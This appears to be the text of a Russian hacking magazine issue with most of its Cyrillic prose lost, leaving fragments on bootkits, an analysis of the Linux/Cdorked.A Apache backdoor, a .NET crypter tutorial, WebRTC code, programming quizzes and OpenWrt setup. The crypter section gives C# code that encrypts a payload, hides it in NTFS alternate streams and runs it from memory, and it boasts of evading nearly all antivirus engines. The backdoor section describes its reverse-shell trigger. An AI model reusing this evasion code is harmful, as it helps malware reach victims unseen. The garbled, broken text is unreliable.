, ,


[Figure labels: MBR shown twice, each with partition table entries #1 to #4; legend for partition entries: Existing, Active, Empty]

. 3. , SST MBR

,
.
(Wolfgang Ettlinger) (Stefan
Viehbck) , , .
,
,
. , ,
NinjaCon 2011 EvilCore.
:
MBR EvilCore Symmetric Multi Processing,

;
, ;

,
, CPU;
CPU0 , CPU1
EvilCore .
:

jmp;
CPU0 , ;
;
.

. 2.

: task

WINDOWS
x64 Microsoft Windows Vista. XP x64, Windows Server 2003.
,
4 , 64- ,
. PatchGuard,
, :
GDT;
IDT;
SSDT;
, NTOSKRNL.EXE, NDIS.SYS, HAL.
DLL;
MSR- STAR/LSTAR/CSTAR/SFMASK.

, PatchGuard, ,
. (
), BSOD.
PatchGuard,
, (Driver Signing
Policy).
PatchGuard Driver Signing Policy ,
.

malware
bootkit ( boot rootkit).

[Figure labels: MBR, BPB, VBR, IPL, NTFS shown twice; the second layout additionally contains "malware"]

. 4. Gapz , 4 BPB

manager (!) . ,
, CPU
. :
. ,
malware,
EvilCore,
.

TDL
TDL . (
Pragma, )
TDL3 TDL4 SST
MaxSS (Olmasco ESET).
TDL ,
, , (TDL, TDSS
Tidserv). TDL4 ,
SST.
TDL3 based SST ( ) 2011 , SST TDL4 MBR. ,
,
, C&C
, ,
.
Microsoft
SST .
JPG,
imageshack.us. ,
livejournal.
com wordpress.com.
,

(. . 3). MBR
,
,
15 .
SST. TDL4,
,
15 , CRC32.
,
.
TDL4
Pihar,

TDL4.
,
. ,
, . , ,
[PurpleHaze] .
Pihar DLL hijacking
Adobe Flash Player.
ZeroAccess, (ncrypt.dll msimg32.dll).
2012 Damballa A New
Iteration of the TDSS/TDL4 Malware Using DGAbased Command-and-Control. ,
,
TDL.
(Pleiades),
, DGA C&C. ,
TDL4,

DGAv14.
kernelmode.info,
TDL4
( ldr16, ldr32, ldr64 ) .


Gapz. , TCP/IP-,
IPS/IDS !

,
PE-.
,
. Gapz , , ,

, .
,
. payload ( AES-256)
System Volume Information
hex-. FAT32,
FullFAT.
Gapz , , 2012-
MBR, VBR, . VBR NTFS
, BIOS Parameter
Block (BPB), .
BPB HiddenSectors, Initial Program Loader (IPL) ,
VBR.
IPL
NTFS .
4- HiddenSectors Gapz
, VBR IPL,
(. . 4). Mebratix (
MBR
).
, Gapz ,
,
-
. Gapz


2012
( ).



(

,
:). .
.).
Guntior
( 2010 ), 2013
Sophos,

.
, EXE,
DLL.
msimg32.dll %Temp%
, , DLL. %Temp%
HelpCtr.exe ( msimg32.dll),
Windows.
HelpCtr.exe PATH , %Temp%
, %System%. HelpCtr.ex
WM_HOTKEY Shell_TryWnd ( <Win +
F1>). , msimg32.dll HelpCtr.exe (
dll hijacking) .
%Temp% , PATH
.
, . - Guntior
Stoned Bootkit (

). Mebroot
IRP_MJ_READ IRP_MJ_WRITE
disk.sys.


Carberp. .
()
() Carberp.
. 5 (2
)
. . Carberp
bootkit-
2011 , Rovnix. , Stoned Sinowal.
Rovnix 2011 ,

Mayachok (Cidox). Rovnix
MBR, NTFS,
Volume Boot Record (VBR).
Mayachok 32-,
64- Rovnix.
.
( -

), ,
. ,

. aPlib .


VBR. Mayachok ,
, , .
Carberp . 2012 ESET Rovnix,
,
VBR,
RC6 .
, VFAT.
Rovnix VBR. , Zeus (, Carberp ),
boot-
.

?
MBR- VBR-
UEFI. , BIOS (Mebromi
2011 ), , BIOS

. UEFI, . , UEFI
,
.
(Andrea Allievi),
ITSEC -,
2012 Windows 8, UEFI-
. ITSEC UEFI UEFI
bootloader .
Kernel Patch Protection Driver
Signature Enforcement . 2013 HITB (Hack in the
Box) (Sbastien Kaczmarek)
QuarksLab Dreamboot: A
UEFI Bootkit Windows 8. Dreamboot github.com.
,
SecureBoot, Microsoft
.
Windows 8
, UEFI
( -,
), ,

, .
( , , , ), ,
(
, -
),

.


BIOS
BIOS
UEFI, ,

(Intel Boot
Initiative) 1998 .
,
BIOS,
16- ,
1 ,
2 ,
.
UEFI
.
BIOS, asm, UEFI .

,

.

GUID Partition Table (GPT),

UEFI ( Linux
64- Windows,
Vista). UEFI
SecureBoot,

,
.
SecureBoot ,
. Linux , Microsoft

Windows (
Microsoft
,
).

Windows 8

SecureBoot , ARM,
.
,
? ,
SecureBoot , OEM-
Microsoft,
,
, Win,
. ,
Linux
Microsoft. , .



LINUX
Linux/Cdorked.A
, Adobe Oracle, , Linux. -. , .
-?

,
Malware Researcher,
ESET

, , . - ,
.
- ,
. . -,
- ,
. -,
- , , .

,
Linux.

LINUX/CDORKED.A

ESET Sucuri -

2013 . - Apache,
lighttpd nginx.
Linux/Cdorked.A
. ,
Blackhole.
Linux/Cdorked.A ELF-
-,
. . , -, root-,

root- . ,
, cPanel .
, Linux/Cdorked.A , .


Linux





: pastebin.com/
zNhD7rai

64- ELF- Apache. ,


. , , , ,
ob87E874aD44B47B8544955.
, ,
. ,
. , , XOR- -.
, IDAPython.
:

# -*- coding: cp1251 -*-
import idaapi
from idaapi import *
from idautils import *
from idc import *


def decrypt_str(offset, size):
    # Static XOR key, applied cyclically to the encrypted bytes
    key = (0x27, 0xA4, 0xE2, 0xDA, 0xDA, 0xF1,
           0x83, 0xB5, 0x1E, 0x3D, 0xA7, 0xF6, 0xC9,
           0xE6, 0x23, 0x9C, 0xDF, 0xC8, 0xA2, 0xE5, 0xA,
           0x60, 0xE0, 0x5F)
    string = bytearray(size)
    for i in range(size):
        b0 = Byte(offset + i) ^ key[i % len(key)]
        string[i] = b0 & 0xFF
    return str(string)


def main():
    # 0x043B8FE-0x43BCE0 (address range given in the original comment);
    # the scan starts at its lower bound
    code_offset = 0x043B8FE
    # Table of string lengths: one byte per string, ended by a zero byte
    xlen = 0x76B480
    strings = []
    # Decrypt every string that has an entry in the length table
    while Byte(xlen):
        # Advance to the next instruction of the form
        # lea rax, offset string
        while (GetMnem(code_offset) != 'lea' or
               GetOpType(code_offset, 0) != idaapi.o_reg or
               GetOpType(code_offset, 1) != idaapi.o_mem):
            code_offset = NextHead(code_offset)
        # Operand 1 is the address of the encrypted string,
        # the current table byte is its length
        decrypted = decrypt_str(GetOperandValue(code_offset, 1), Byte(xlen))
        strings.append(decrypted)
        code_offset = NextHead(code_offset)
        xlen += 1
    # Annotate every call site of the function named decrypt_strings
    func = LocByName('decrypt_strings')
    for addr in CodeRefsTo(func, True):
        # Walk back to the preceding mov edi, ID (register number 7 is edi);
        # ID is the index of the requested string
        while (GetMnem(addr) != 'mov' or
               GetOpType(addr, 0) != idaapi.o_reg or
               GetOperandValue(addr, 0) != 7):
            addr = PrevHead(addr)
        # Put the decrypted string in a comment next to the ID load
        MakeComm(addr, strings[GetOperandValue(addr, 1)])


if __name__ == '__main__':
    main()

reverse shell

?
,
Linux/Cdorked.A,
http://server.ru/favicon.iso.

.

,
debsums Debian Ubuntu,
rpm verify RPM-based Linux .

-. shared memory, .

shared memory


,
. reverse shell,
, GET HTTP- .
/favicon.iso ( iso, ico!).

GET_BACK;HOST;PORT, HOST PORT IP- ,
reverse shell.
IP- X-Forwarded-For
X-Real-IP XOR-, . hex-.
, ,
HTTP- . /favicon.iso - -.
, http://google.com/.
.
POST- HTTP- URL. , ,
reverse shell. Cookie SECID=.
Etag HTTP-.
:
L1, D1 / URL,
;
L2, D2 / IP- ;
L3, D3 / User-Agent ;

L4, D4 / User-Agent ;
L6, D6 / IP- ;
L7, D7 ;
L8, D8 / IP- ;
L9, D9 / Accept-Language
;
LA, DA
;
ST ;
DU IP- ;
T1 .

, .

,
.
IP- , .
,
, .
shared
memory 6 .
-,
. , Linux/Cdorked.A
, nginx lighttpd: goo.gl/5iL5E.

, Sucuri
shared memory,
. , , Internet
Explorer Firefox, , , iPhone iPad.
, HTTP- : Accept-Language, Accept-Encoding, Referrer,
User-Agent. , Cookie :
GIDID=6745609876567 ; path=/; expires=Friday, 31-Dec-2030
23:59:59 GMT. -, Cookie
, Referrer : *adm*, *webmaster*, *submit*, *stat*,
*mrtg*, *webmin*, *cpanel*, *memb*, *bucks*, *bill*, *host*,
*secur*, *support*.

. ,
Linux , .


XXI

Dywar
mrdywar@gmail.com

, , . ,
, -
. , ? , 2013
! proof-of-concept. !
. , .
Native , C++, calc.exe.
.NET CLR, C#,
.
, .
.
, .

:
Static (- );
Polymorph (- ).

:
Scantime ( HDD, );
Runtime ( ).

), , Test.cs
.
, , , ...

SCANTIME CRYPTER
, Scantime, HDD. Visual Studio
Csharp_ScanTime_Temp.rar. Form1.cs GUI-
(. 1),
.
Crypt.
System.Resources.
ResourceWriter("res.resources"), AddResource
file
RC4
RC4KEY. CodeDom, CompilerParameters (GenerateExecutable
= true, OutputAssembly = "File.exe", ReferencedAssemblies.Add("System.dll"),
EmbeddedResources.Add("res.resources"), CompilerOptions += "/t:winexe").
CompilerResults. HDD, File.
Delete("res.resources") , ,
CodeDom.Compiler.CompilerError.
, , , , , . .

Temp
Static- C Sharp,
Scantime Runtime. , Visual
Studio Express Microsoft,
2010.
DVD, .
Source (

,
%temp%. , Source Csharp_ScanTime_Temp.rar. ,
( ) ,
. ResourceManager, RC4KEY.


CompilerResults, .
.NET Reflector ,
. .


Csharp_RunTime_Simple.rar, Source.
. 1. .
!


b, ,
. .
Path.GetTempPath(),
string "nameA", Your_File.exe. ,
( ), ! WriteAllBytes File, .
Process.Start(nameA), .
,
.
native .NET.

NTFS-
Csharp_SanTime_NTFS.
rar, Source. ,
,
. , API-
.
:
1. .
,
, : JustTempFile.
tmp:YourFile.exe.
2. PInvokeWin32API.
WriteAlternateStreamBytes(nameA, NTFSName, b),
,
, .
3. Process.Start(), , Windows 7
( ).
API, StartNTFSProcess.
Start(nameA + ":" + NTFSName),
.
4. File.
Delete(nameA), ,
%temp% . ,
.
HDD. native NTFS.
AlternateStreamView.

static void Main() {


byte[] betyFile = RC4EncryptDecrypt(Convert.
FromBase64String("$FILE$"), "RC4KEY");
System.Reflection.Assembly.Load(betyFile).EntryPoint.
Invoke(null, null);
}
, HDD . , !
? ... , , , . , ...


Csharp_RunTime_Hard.rar .
-
. , ! -.
: , ,
, .
Source.
, . :

Globals.randomPasswd = RandomPassNewGlobal();
byte[] filebytes = RC4EncryptDecrypt(System.IO.File.
ReadAllBytes(textBox1.Text), Globals.randomPasswd);
int a = filebytes.Length / 4;
byte[] partofthebytes = new byte[a];
Array.Copy(filebytes, 0, partofthebytes, 0, a);
Globals.partOneHash = md5Hash
(Convert.ToBase64String(partofthebytes));
Globals.partOneKey = RandomPassNew();
partofthebytes = RC4EncryptDecrypt
(partofthebytes, Globals.partOneKey);
Globals.filePartOne = Convert.ToBase64String(partofthebytes);
public static string RandomPassNew() {
Random rnd = new Random();
uint rOne = (uint) rnd.Next(52345, 52348);
uint rTwo = (uint) rnd.Next(39327, 39329);
uint rMul = rOne * rTwo;
return rMul.ToString();
}
-, , 4 ( ). , ,
Array.Copy() . MD5-

RUNTIME CRYPTER


HDD.
Base64- Source Crypt.
.NET-. :

WARNING

byte[] filebytes = RC4EncryptDecrypt(System.


IO.File.ReadAllBytes(textBox1.Text), "RC4KEY");
string NewSource = Properties.Resources.Source;
NewSource = NewSource.Replace("$FILE$", Convert.
ToBase64String(filebytes));
,
string, Source,
, Replace,
. CodeDom.Compiler.

. 2. temp NTFS-


. ,


,

.


. 3.

Convert.ToBase64String() . .
, :

Thread threadpartone = new Thread(ThreadFourMethod);


threadpartone.Start();
private static void ThreadFourMethod() {
string partFourHash = "$partFourHash$";
byte[] ByteFileFour = Convert.
FromBase64String("$baseFour$");
while (true) { string rndpasswd = RandomPassNew();
byte[] befoRndDecOne =
RC4EncryptDecrypt(ByteFileFour, rndpasswd);
string bufferForParts = md5Hash(Convert.
ToBase64String(befoRndDecOne));
if (partFourHash == bufferForParts) {
bytefromthreadfour = befoRndDecOne;
break;
}
}
}
Array.Reverse(bytefromthreadtwo);
Array.Copy(bytefromthreadone, 0, FileHere, 0,
bytefromthreadone.Length);
System.Reflection.Assembly.Load(RC4EncryptDecrypt
(testa, (testb + testccc).ToString())).EntryPoint.
Invoke(null, null);

. 4. VirusTotal

,
.
, , , .
,
Array.Reverse()
Array.Copy(). , , , System.Reflection.Assembly.Load(),
( , ).

VIRUSTOTAL
ReverseSocksBot, .NET, VT ( ). 26/46 (. 4).
.
1/46 (. 5), !

.NET ,
Framework .
, ( ) . :
!

. 5. VirusTotal


WebRTC +


alykoshin@gmail.com,
ligne.ru


: Java,
ActiveX, Adobe Flash...

,
(
- ?) , ,
. ? !

WebRTC -
- WebRTC :
(, ) navigator.
getUserMedia, MediaStream;
peer-to-peer , ,
RTCPeerConnection (
- ) RTCDataChannel (
).

?
,
WebRTC . Chrome/Chromium,
WebRTC , 22 Firefox
. ,
API . Chromium 28.
-.

MediaStream
WebRTC MediaStream. . Chrome
navigator.webkitGetUserMedia() ( ,
, Firefox navigator.
mozGetUserMedia()).
.
, .
callback-: /, .
HTML- rtctest1.html <video>:

<!DOCTYPE html>
<html>
<head><title>WebRTC - </title>
<style>
video { height: 240px; width: 320px;
border: 1px solid grey; }
</style>
</head>
<body>
<button id="btn_getUserMedia"
onclick="getUserMedia_click()">
getUserMedia
</button>
<br>
<video id="localVideo1" autoplay="true"></video>
<script></script>
</body>
</html>

geishaboy500@flickr.com

IP- : SIP,
, H.323 MGCP,
Jabber/Jingle ( Gtalk), Adobe RTMP*
, , Skype. WebRTC, Google, IP- -,
, Skype. WebRTC
,
, ( ,
, ).



<script> </script> HTML-
:


var localStream = null;

[Figure labels: RTCPeerConnection to RTCPeerConnection; SDP, ICE, (SRTP)]

getUserMedia
:

// Request both audio and video
var streamConstraints = { "audio": true, "video": true };

var streamConstraints = {
  "audio": true,
  "video": {
    "mandatory": { "maxWidth": "320",
                   "maxHeight": "240",
                   "maxFrameRate": "5" },
    "optional": []
  }
};
getUserMedia callback-,
:

function getUserMedia_success(stream) {
  console.log("getUserMedia_success():", stream);
  // Show the stream in the HTML <video> element
  localVideo1.src = URL.createObjectURL(stream);
  // Keep the stream for later use
  localStream = stream;
}
callback- ,

function getUserMedia_error(error) {
  console.log("getUserMedia_error():", error);
}
getUserMedia

function getUserMedia_click() {
  console.log("getUserMedia_click()");
  navigator.webkitGetUserMedia(streamConstraints,
    getUserMedia_success, getUserMedia_error);
}
, ,
. , :

NavigatorUserMediaError {code: 1,
PERMISSION_DENIED: 1}"
,

.
, Chrome,
Settings (), Show advanced settings
( ), Privacy
( ), Content ( ).

RTCPeerConnection

STUN

TURN

Firefox Opera
.
HTTP .
HTTPS ,
.

.

RTCMediaConnection
RTCMediaConnection , . , (SDP), ICE-
NAT ( STUN)
TURN-.
RTCMediaConnection . SRTP.
RTCMediaConnection , ,
.
. , RTCMediaConnection ( , ).

OFFER-ANSWER
offer/answer
(/; RFC3264: tools.ietf.org/html/rfc3264) SDP
(Session Description Protocol). SIP.
: Offerer , SDP- (Offer SDP), Answerer , SDP-
(Answer SDP).
(, SIP -,
), SDP .
RTCMediaConnection,
:
, , Offer, SDP ( SIP),
,
. .
Answer, SDP .
ICE, .
.

OFFER
Offer .
. createOffer()
callback-, ( ,
).
: onicecandidate ICE- onaddstream .
. HTML <button>
:

<button id="btn_createOffer" onclick="createOffer_click()">createOffer</button>

<video> ( ):

<br>
<video id="remoteVideo1" autoplay=true></video>
JavaScript-
RTCPeerConnection:

var pc1;
RTCPeerConnection STUN/
TURN-. . ;
, .

var servers = null;

Offer SDP

var offerConstraints = {};

createOffer() callback-,
Offer

function pc1_createOffer_success(desc) {
  console.log("pc1_createOffer_success(): \ndesc.sdp:\n" + desc.sdp + "desc:", desc);
  // Give this RTCPeerConnection the generated Offer SDP
  // via setLocalDescription
  pc1.setLocalDescription(desc);

  // The Answer SDP from the far side is later applied with
  // setRemoteDescription. Passing the Offer to the far side
  // is commented out at this step:
  // pc2_receivedOffer(desc);
}

callback-,

function pc1_createOffer_error(error) {
  console.log("pc1_createOffer_success_error(): error:", error);
}
callback-, ICE-
:

function pc1_onicecandidate(event) {
  if (event.candidate) {
    console.log("pc1_onicecandidate():\n" +
      event.candidate.candidate.replace("\r\n", ""), event.candidate);
    // Passing the candidate to the far side is commented out at this step:
    // pc2.addIceCandidate(new RTCIceCandidate(event.candidate));
  }
}
callback-
( , RTCPeerConnection):

function pc1_onaddstream(event) {
  console.log("pc_onaddstream()");
  remoteVideo1.src = URL.createObjectURL(event.stream);
}

createOffer RTCPeerConnection, onicecandidate onaddstream Offer


SDP, createOffer():

JavaScript

MICROSOFT CU-RTC-WEB
Microsoft Microsoft,
Google
CU-RTC-Web (bit.ly/
Z63rre). IE, ,
,
Skype Microsoft Google, ,

Skype. Google ;
- , IP
, ,
.


,

. .



Offer,
SDP,

[Diagram: RTCPeerConnection call sequence between two peers, each shown as "pc : RTCPeerConnection"]
1. Caller: addStream(), createOffer() -> offer, setLocalDescription(offer); the Offer SDP goes to the callee.
2. Callee: setRemoteDescription(offer), createAnswer() -> answer, setLocalDescription(answer); the Answer SDP goes to the caller.
3. Caller: setRemoteDescription(answer).
4. ICE candidates, in both directions: onicecandidate(candidate) on one side, addIceCandidate(candidate) on the other.
5. onaddstream(stream) on both sides; media flows over SRTP.

function createOffer_click() {
  console.log("createOffer_click()");
  // Create the RTCPeerConnection
  pc1 = new webkitRTCPeerConnection(servers);
  // Callback for handling ICE candidates
  pc1.onicecandidate = pc1_onicecandidate;
  // Callback invoked when a media stream arrives from the far side
  pc1.onaddstream = pc1_onaddstream;
  // Attach the local media stream
  // (assumes getUserMedia has already returned it)
  pc1.addStream(localStream);
  // Ask for the Offer to be created
  pc1.createOffer(
    pc1_createOffer_success,
    pc1_createOffer_error,
    offerConstraints
  );
}

TURN-
ICE- : host, srflx relay. Host ,
, srflx , (STUN), relay
TURN-. NAT, host , srflx
NAT relay
.
ICE- host, 192.168.1.37 udp/34022:

a=candidate:337499441 2 udp 2113937151 192.168.1.37 34022 typ host generation 0

STUN/TURN-:

var servers = { "iceServers": [
  { "url": "stun:stun.stunprotocol.org:3478" },
  { "url": "turn:user@host:port", "credential": "password" }
]};
STUN- . , , : www.
voip-info.org/wiki/view/STUN. , . TURN-, STUN, . , TURN ,
, . TURN- (, IP). , ,
rfc5766-turn-server (code.google.com/p/rfc5766-turn-server). Amazon EC2.
TURN , , , ,
, - WebRTC Skype
(NAT) , .

rtctest2.html,
,
, .
,
. , SDP
, , ,
ICE- .

ANSWER SDP ICE-


Offer SDP, ICE- RTCPeerConnection setRemoteDescription Offer
SDP addIceCandidate ICE-, ;
Answer SDP ICE-. Answer
SDP Offer; , createOffer,
createAnswer RTCPeerConnection setRemoteDescription
Offer SDP, .
HTML:

<video id="remoteVideo2" autoplay=true></video>

RTCPeerConnection :

var pc2;

Offer Answer SDP


Answer SDP Offer. callback-,
Answer, Offer,
Answer SDP :

function pc2_createAnswer_success(desc) {
  pc2.setLocalDescription(desc);
  console.log("pc2_createAnswer_success()", desc.sdp);
  pc1.setRemoteDescription(desc);
}

Callback-, Answer, Offer:

function pc2_createAnswer_error(error) {
  console.log('pc2_createAnswer_error():', error);
}

Answer SDP:

var answerConstraints = {
  'mandatory': { 'OfferToReceiveAudio': true,
                 'OfferToReceiveVideo': true }
};

Offer
RTCPeerConnection Answer Offer:

function pc2_receivedOffer(desc) {
  console.log("pc2_receiveOffer()", desc);
  // Create the second RTCPeerConnection
  pc2 = new webkitRTCPeerConnection(servers);

  // Callback for handling ICE candidates
  pc2.onicecandidate = pc2_onicecandidate;

  // Callback that shows the incoming stream in the HTML <video> element
  pc2.onaddstream = pc2_onaddstream;

  // Attach the local media stream (in this single-page test
  // it is the same stream the first connection uses)
  pc2.addStream(localStream);

  // Now that the RTCPeerConnection exists, hand it the Offer SDP
  // received from the other side
  pc2.setRemoteDescription(new RTCSessionDescription(desc));

  // Ask for the Answer to be created
  pc2.createAnswer(
    pc2_createAnswer_success,
    pc2_createAnswer_error,
    answerConstraints
  );
}

localVideo1.src = ""; localStream.stop(); localStream = null;


// HTML// <video>, ,
// = null
remoteVideo1.src = ""; pc1.close(); pc1 = null;
remoteVideo2.src = ""; pc2.close(); pc2 = null;

getUserMedia
MediaStream, :

video: {
mandatory: { chromeMediaSource: 'screen'
optional: []
}};

}
},

:
getUserMedia() chrome://
flags/,chrome://flags/;
HTTPS (SSL origin);
;
.

WEBRTC
WebRTC ,
. JsSIP (jssip.net) , SIP-, Asterisk
Camalio. PeerJS (peerjs.com) P2P-
, Holla (wearefractal.com/holla) , P2P- .

rtctest3.html, .

RTCPeerConnection . Offer Answer SDP, ICE-
,
-
, -.

Node.js socket.io
SDP ICE-
RTCPeerConnection , Node.js socket.io.
Node.js ( Debian/Ubuntu) : bit.ly/jTdcri.

$ sudo apt-get install python-software-properties python g++ make
$ sudo add-apt-repository ppa:chris-lea/node.js
$ sudo apt-get update
$ sudo apt-get install nodejs
: bit.ly/
egLfzu. :

$ echo "sys=require('util'); sys.puts('Test message');" > nodetest1.js
$ nodejs nodetest1.js
Offer SDP , pc1_createOffer_
success() :

npm (Node Package Manager) socket.io express:

pc2_receivedOffer(desc);

$ npm install socket.io express

ICE-, ICE- pc1_


onicecandidate() :

, nodetest2.js :

pc2.addIceCandidate(new
RTCIceCandidate(event.candidate));
ICE- :

function pc2_onicecandidate(event) {
  if (event.candidate) {
    console.log("pc2_onicecandidate():", event.candidate.candidate);
    pc1.addIceCandidate(new RTCIceCandidate(event.candidate));
  }
}
allback- :

function pc2_onaddstream(event) {
  console.log("pc_onaddstream()");
  remoteVideo2.src = URL.createObjectURL(event.stream);
}

$ nano nodetest2.js
var app = require('express')()
  , server = require('http').createServer(app)
  , io = require('socket.io').listen(server);

server.listen(80); // listen on port 80

// Handle requests for the root URL
app.get('/', function (req, res) {
  // Send the HTML page
  res.sendfile(__dirname + '/nodetest2.html');
});

// Handle a new socket.io connection
io.sockets.on('connection', function (socket) {
  // Send an event to the client
  socket.emit('server event', { hello: 'world' });
  // Log the data of events received from the client
  socket.on('client event', function (data) {
    console.log(data);
  });
});
nodetest2.html :


HTML

<button id="btnHangup" onclick="btnHangupClick()">Hang Up


</button>

function btnHangupClick() {
// HTML- <video>,
// , = null

$ nano nodetest2.html
<script src="/socket.io/socket.io.js"></script>
<script>
  // URL of the socket.io server ('/' is the host the page was loaded from)
  var socket = io.connect('/');
  socket.on('server event', function (data) {
    console.log(data);
    socket.emit('client event', { 'name': 'value' });
  });
</script>
:

$ sudo nodejs nodetest2.js


http://localhost:80 ( 80- ) . , JavaScript
.

RTCPEERCONNECTION
-

(rtcdemo3.html)
rtcdemo4.html. <head> socket.io:

<script src="/socket.io/socket.io.js"></script>
JavaScript -:

var socket = io.connect('http://localhost');


-:

function pc1_createOffer_success(desc) {
  ...
  // pc2_receivedOffer(desc);
  socket.emit('offer', desc);
  ...
}
function pc2_createAnswer_success(desc) {
  ...
  // pc1.setRemoteDescription(desc);
  socket.emit('answer', desc);
}
function pc1_onicecandidate(event) {
  ...
  // pc2.addIceCandidate(new RTCIceCandidate(event.candidate));
  socket.emit('ice1', event.candidate);
  ...
}
function pc2_onicecandidate(event) {
  ...
  // pc1.addIceCandidate(new RTCIceCandidate(event.candidate));
  socket.emit('ice2', event.candidate);
  ...
}
hangup()
-:


socket.on('ice2', function (data) {
  console.log("socket.on('ice2'):", data);
  pc1.addIceCandidate(new RTCIceCandidate(data));
});
socket.on('hangup', function (data) {
  console.log("socket.on('hangup'):", data);
  remoteVideo2.src = ""; pc2.close(); pc2 = null;
});


nodetest2.js
rtctest4.js io.sockets.on('connection', function (socket) { ...
} :

// On an 'offer' message, send the data straight back
// to the same socket it came from
socket.on('offer', function (data) {
  socket.emit('offer', data);
  // To relay it to the other connected clients instead, use:
  // socket.broadcast.emit('offer', data);
});
socket.on('answer', function (data) {
  socket.emit('answer', data);
});
socket.on('ice1', function (data) {
  socket.emit('ice1', data);
});
socket.on('ice2', function (data) {
  socket.emit('ice2', data);
});
socket.on('hangup', function (data) {
  socket.emit('hangup', data);
});
, HTML-
:

// res.sendfile(__dirname + '/nodetest2.html');
res.sendfile(__dirname + '/rtctest4.html');
:

$ sudo nodejs rtctest4.js



, . , , ,
. . , ,
STUN/TURN- .

function btnHangupClick() {
...
// remoteVideo2.src = ""; pc2.close(); pc2 = null;
socket.emit('hangup', {});
}
:

socket.on('offer', function (data) {
  console.log("socket.on('offer'):", data);
  pc2_receivedOffer(data);
});
socket.on('answer', function (data) {
  console.log("socket.on('answer'):", data);
  pc1.setRemoteDescription(new RTCSessionDescription(data));
});
socket.on('ice1', function (data) {
  console.log("socket.on('ice1'):", data);
  pc2.addIceCandidate(new RTCIceCandidate(data));
});

, ,
, pc1 pc2
RTCPeerConnection
<video>, . , WebRTC,
( ) , . ,
. ,
: simpl.info getUserMedia (bit.ly/YdlpBv), simpl.info
RTCPeerConnection (bit.ly/18a1L0v), WebRTC Reference App (bit.ly/Wjb0cA).
, WebRTC
,
, . WebRTC , . , , .
() (bit.ly/16zeiuW), (bit.ly/ZqvaxR), P2P- (https://peercdn.com) RTCDataChannel.



lozovsky@glc.ru

EMBARCADERO
,
.
,
, RAD Studio 4 100
. : ,
Delphi, C++ Builder FireMonkey
iOS,
! , Embarcadero
:). !

B = class(A)
public
procedure Fun;
end;
procedure A.Fun;
begin
ShowMessage('A');
end;
procedure B.Fun;
begin
ShowMessage('B');
end;

1
, :

procedure TForm1.Button1Click
(Sender: TObject);
begin
try
try
StrToInt('some number');
ShowMessage('1');
except
ShowMessage('2');
end;
finally
ShowMessage('3');
end;
ShowMessage('4');
end;

//
var
refA : A;
refB : B;
begin
refA := B.Create;
refB := refA;
refA.Fun;
refB.Fun;
//
end;

?
: 2, 3, 4. 1 ,
.
2 except.
finally .
4 ,
.

2
:

A = class
public
procedure Fun;
end;

? ()
?
?
,
B?

: refB :=
refA. : refB := refA as B
refB := B(A).
,
B = class(A).
A B.

B, virtual procedure Fun A override
procedure B B.

3
:

IMyInterface = interface
end;
TMyClass = class(TInterfacedObject,
IMyInterface)
public
destructor Destroy;
end;
destructor TMyClass.Destroy;
begin
ShowMessage('destructor');
end;
procedure TForm1.Button1Click
(Sender: TObject);
var
inf : IMyInterface;
begin
inf := TMyClass.Create;
end;
,
destructor?
: override .
, Free !

4
TTable.
?
1. Table1.FieldByName('id').Value := 10;
2. Table1.FieldByName('id').Value := 'ten';
3. Table1.FieldByName('id').AsInteger := 10;
4. Table1.Fields[0].AsString := 10;
5. Table1['id'] := 10;
6. Table1['id'] := 'ten';
7. Table1.Fields['id'] := 'ten';
8. Table1.Fields['id'] := 10;
9. Table1.Fields.FieldByName('id').AsString := 10;
10. Table1.FieldsById('id').Value := 10;
11. Table1.Fields.FieldByName('id').AsInteger := 10;
: 1, 2, 3, 5, 6,
11. : 4, 7,
8 9 , 10 .


IT-, !
- ,
, . lozovsky@
glc.ru . , , . , , , .





,
?

std::map<int, int> myMap;
// 1
myMap.insert(std::pair<int, int>(10, 20));
// 2
myMap.insert(std::make_pair(30, 40));


Method1(), Method2() ?
,
.

class CA
{
public:
    virtual ~CA() {}
    void Method1() { std::cout << "Hello, world?"; }
    virtual void Method2() { std::cout << "Hello, world?"; }
};

CA* pA = NULL;
pA->Method1();
pA->Method2();


. 1 3, 2
5, 20. 255 .
. 1
2 ,
,
.
.
(ERD)
.

4. A, C, D
5. A, B, D

PL/SQL

public static void main(String[] args) {
    EntityManagerFactory emf = Persistence.createEntityManagerFactory("myPU");
    EntityManager em = emf.createEntityManager();
    MyEntity e = new MyEntity(); // 1
    em.getTransaction().begin();
    em.persist(e); // 2
    em.getTransaction().commit(); // 3
    em.close();
    em = emf.createEntityManager(); // 4
    e = em.find(MyEntity.class, e.getId()); // 5
    em.close();
    em = emf.createEntityManager(); // 6
    e = em.merge(e); // 7
    em.getTransaction().begin();
    em.remove(e); // 8
    Long amount = (Long) em.createQuery(
        "select count(e.id) from MyEntity e").getSingleResult(); // 9
    em.getTransaction().commit(); // 10
    em.close(); // 11
}

B
.
, , ,
dbms_output.
, .

C#

(garbagecollector) CLR:
A. , .
B. , , .
C. .
D. ,
, .
:
1. B, C
2. A, D
3. B, D

Java
:
e (new,
managed, detached, removed);

( ),
.

CWnd, CWnd::GetDlgI
tem(intnIDControl)?

IT- CUSTIS
(CUSTIS.RU)

, !

, ,
. , . !

, , , ( 1, 2,
). 1 , 2 , 2.

Unixoid



.
- , -
DLNA/VoIP/-, -
.
,
, .

SOHO- ,
, .
,
- ,
.
. , (,
, Huawei, )
Linux,
, , , ?
,
.


rommanio@yandex.ru


:
OpenWrt (https://openwrt.org) ,
. ,
, ( , jffs2 overlayfs
squashfs), opkg
, 3000 ,
/. . ,
.
DD-WRT (www.dd-wrt.com)
. , ,
, ,
, .
(oleg.wl500g.info). Asus. , ,

- .
Tomato (polarcloud.com/tomato) Broadcom.
.


LibreWRT (librewrt.org) FSF. , OpenWrt


,
, .
, - FSF :

, , .
, ,
, . TP-LINK TL-WDR4300 OpenWrt,
.


OPENWRT
.
, .
TP-LINK openwrt-ar71xx-generic-tl-wdr4300-v1-squashfs-factory.bin.
(ar71xx), (generic), ,
(factory) OpenWrt (sysupgrade).
sysupgrade .
, ,
.
. Telnet ( 192.168.1.1)
WAN. ,
. , ( , , ),
MAC-,
MAC- ClientID.
( , , ,
openwrt#):

openwrt# uci set network.wan.proto=dhcp
openwrt# uci set network.wan.broadcast=1
openwrt# uci set network.wan.macaddr=09:aa:bb:cc:dd:ee
openwrt# uci set network.wan.clientid=0109aabbccddee
openwrt# uci commit network
openwrt# /etc/init.d/network restart

- OpenWrt

TP-LINK
TL-WDR4300 firmware

WARNING
!


.

UCI (Unified Configuration Interface) ( ) . UCI /etc/config.


, ,
OpenWrt
UCI , , Samba. , ,
, , ( vi)
uci.
.
, -, :
